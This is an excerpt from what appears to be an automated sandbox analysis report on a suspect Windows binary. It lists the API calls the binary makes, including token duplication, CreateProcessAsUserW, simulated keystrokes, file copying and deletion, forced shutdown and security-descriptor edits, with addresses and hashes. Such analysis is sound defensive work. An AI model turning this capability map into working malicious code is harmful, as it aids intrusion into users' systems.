                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                                                  • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                                                  • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                                                  • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                                                  • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                                                  • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                                                  • keybd_event.USER32(00000012,00000000), ref: 00434514
                                                                  • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                                                  • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                                                  • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                  • String ID: Shell_TrayWnd
                                                                  • API String ID: 2889586943-2988720461
                                                                  • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                  • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                                                  • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                  • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                                                  APIs
                                                                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                                                  • CloseHandle.KERNEL32(?), ref: 004463A0
                                                                  • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                                                  • GetProcessWindowStation.USER32 ref: 004463D1
                                                                  • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                                                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                                                  • _wcslen.LIBCMT ref: 00446498
                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                  • _wcsncpy.LIBCMT ref: 004464C0
                                                                  • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                                                  • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                                                  • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                                                  • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                                                  • CloseWindowStation.USER32(00000000), ref: 0044656C
                                                                  • CloseDesktop.USER32(?), ref: 0044657A
                                                                  • SetProcessWindowStation.USER32(?), ref: 00446588
                                                                  • CloseHandle.KERNEL32(?), ref: 00446592
                                                                  • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                                                                  • String ID: $@OH$default$winsta0
                                                                  • API String ID: 3324942560-3791954436
                                                                  • Opcode ID: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                                                                  • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                                                  • Opcode Fuzzy Hash: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                                                                  • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                                                  APIs
                                                                  • _wcslen.LIBCMT ref: 004096C1
                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                  • _memmove.LIBCMT ref: 0040970C
                                                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                    • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                  • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                                                  • _memmove.LIBCMT ref: 00409D96
                                                                  • _memmove.LIBCMT ref: 0040A6C4
                                                                  • _memmove.LIBCMT ref: 004297E5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                                                  • String ID:
                                                                  • API String ID: 2383988440-0
                                                                  • Opcode ID: e127891bc0a98d019add158fe61e22172890978285290b421ac62a594046158c
                                                                  • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                                                  • Opcode Fuzzy Hash: e127891bc0a98d019add158fe61e22172890978285290b421ac62a594046158c
                                                                  • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B
                                                                  APIs
                                                                    • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                    • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 0043392E
                                                                    • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 00433950
                                                                    • Part of subcall function 00433908: __wcsicoll.LIBCMT ref: 00433974
                                                                    • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                  • _wcscat.LIBCMT ref: 0044BD94
                                                                  • _wcscat.LIBCMT ref: 0044BDBD
                                                                  • __wsplitpath.LIBCMT ref: 0044BDEA
                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
                                                                  • _wcscpy.LIBCMT ref: 0044BE71
                                                                  • _wcscat.LIBCMT ref: 0044BE83
                                                                  • _wcscat.LIBCMT ref: 0044BE95
                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC1
                                                                  • DeleteFileW.KERNEL32(?), ref: 0044BED3
                                                                  • MoveFileW.KERNEL32(?,?), ref: 0044BEF3
                                                                  • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0A
                                                                  • DeleteFileW.KERNEL32(?), ref: 0044BF15
                                                                  • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2C
                                                                  • FindClose.KERNEL32(00000000), ref: 0044BF33
                                                                  • MoveFileW.KERNEL32(?,?), ref: 0044BF4F
                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
                                                                  • FindClose.KERNEL32(00000000), ref: 0044BF7C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                                                  • String ID: \*.*
                                                                  • API String ID: 2188072990-1173974218
                                                                  • Opcode ID: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                                  • Instruction ID: 72a2fd59153234373391f972af8bc7e503bf673df65afccb4f4ecee040a4f935
                                                                  • Opcode Fuzzy Hash: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                                  • Instruction Fuzzy Hash: E25167B2408384AAD734DB50DC45EDF73E9AFC8304F544E1EF68982141EB75D249CBA6
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                                                  • FindClose.KERNEL32(00000000), ref: 00478924
                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                                                  • __swprintf.LIBCMT ref: 004789D3
                                                                  • __swprintf.LIBCMT ref: 00478A1D
                                                                  • __swprintf.LIBCMT ref: 00478A4B
                                                                  • __swprintf.LIBCMT ref: 00478A79
                                                                    • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                                                    • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                                                  • __swprintf.LIBCMT ref: 00478AA7
                                                                  • __swprintf.LIBCMT ref: 00478AD5
                                                                  • __swprintf.LIBCMT ref: 00478B03
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                                                  • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                  • API String ID: 999945258-2428617273
                                                                  • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                  • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                                                  • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                  • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                                                                  APIs
                                                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                  • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                  • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                  • __wsplitpath.LIBCMT ref: 00403492
                                                                    • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                  • _wcscpy.LIBCMT ref: 004034A7
                                                                  • _wcscat.LIBCMT ref: 004034BC
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                    • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                    • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                                                    • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                                                  • _wcscpy.LIBCMT ref: 004035A0
                                                                  • _wcslen.LIBCMT ref: 00403623
                                                                  • _wcslen.LIBCMT ref: 0040367D
                                                                  Strings
                                                                  • Unterminated string, xrefs: 00428348
                                                                  • Error opening the file, xrefs: 00428231
                                                                  • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                                                  • _, xrefs: 0040371C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                                                  • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                                  • API String ID: 3393021363-188983378
                                                                  • Opcode ID: ce77724faf1e7fbc9fcf9b1a922f2907e035de924d79ec5656a8af7ae9668c55
                                                                  • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                                                  • Opcode Fuzzy Hash: ce77724faf1e7fbc9fcf9b1a922f2907e035de924d79ec5656a8af7ae9668c55
                                                                  • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB

APIs
• FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
• GetFileAttributesW.KERNEL32(?), ref: 00431AE7
• SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
• FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
• FindClose.KERNEL32(00000000), ref: 00431B20
• FindClose.KERNEL32(00000000), ref: 00431B34
• FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
• SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
• SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
• FindClose.KERNEL32(00000000), ref: 00431BCD
• FindClose.KERNEL32(00000000), ref: 00431BDB
Similarity
• API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
• String ID: *.*
• API String ID: 1409584000-438819550
• Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
• Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
• Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
• Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9

APIs
• GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
• __swprintf.LIBCMT ref: 00431C2E
• _wcslen.LIBCMT ref: 00431C3A
• CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
Similarity
• API ID: CreateDirectoryFullNamePath__swprintf_wcslen
• String ID: :$\$\??\%s
• API String ID: 2192556992-3457252023
• Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
• Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
• Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
• Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8

APIs
• GetLocalTime.KERNEL32(?), ref: 004722A2
• __swprintf.LIBCMT ref: 004722B9
• SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
• SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
• SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
• SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
• SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
• SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
• SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
• SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
• SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
Similarity
• API ID: FolderPath$LocalTime__swprintf
• String ID: %.3d
• API String ID: 3337348382-986655627
• Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
• Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
• Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
• Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64

APIs
• FindFirstFileW.KERNEL32(?,?), ref: 004428A8
• FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
• FindClose.KERNEL32(00000000), ref: 0044291C
• FindClose.KERNEL32(00000000), ref: 00442930
• FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
• SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
• SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
• FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
• FindClose.KERNEL32(00000000), ref: 004429D4
  • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
• FindClose.KERNEL32(00000000), ref: 004429E2
Similarity
• API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
• String ID: *.*
• API String ID: 2640511053-438819550
• Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
• Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
• Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
• Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8

APIs
• GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
• OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
• LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
• GetLastError.KERNEL32 ref: 00433414
• ExitWindowsEx.USER32(?,00000000), ref: 00433437
• InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
• SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
Similarity
• API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
• String ID: SeShutdownPrivilege
• API String ID: 2938487562-3733053543
• Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
• Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
• Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
• Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765

APIs
  • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
  • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
  • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
  • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
• GetLengthSid.ADVAPI32(?), ref: 004461D0
• GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
• GetLengthSid.ADVAPI32(?), ref: 00446241
• GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
• CopySid.ADVAPI32(00000000), ref: 00446271
• AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
Similarity
• API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
• String ID:
• API String ID: 1255039815-0
• Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
• Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
• Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
• Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69

APIs
• __swprintf.LIBCMT ref: 00433073
• __swprintf.LIBCMT ref: 00433085
• __wcsicoll.LIBCMT ref: 00433092
• FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
• LoadResource.KERNEL32(?,00000000), ref: 004330BD
• LockResource.KERNEL32(00000000), ref: 004330CA
• FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
• LoadResource.KERNEL32(?,00000000), ref: 00433105
• SizeofResource.KERNEL32(?,00000000), ref: 00433114
• LockResource.KERNEL32(?), ref: 00433120
Similarity
• API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
• String ID:
• API String ID: 1158019794-0
• Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
• Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
• Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
• Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8

APIs
                                                                  Similarity
                                                                  • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                  • String ID:
                                                                  • API String ID: 1737998785-0
                                                                  • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                  • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                                                                  • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                  • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                                                  • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                                                  • GetLastError.KERNEL32 ref: 0045D6BF
                                                                  • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Error$Mode$DiskFreeLastSpace
                                                                  • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                  • API String ID: 4194297153-14809454
                                                                  • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                  • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                                                  • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                  • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
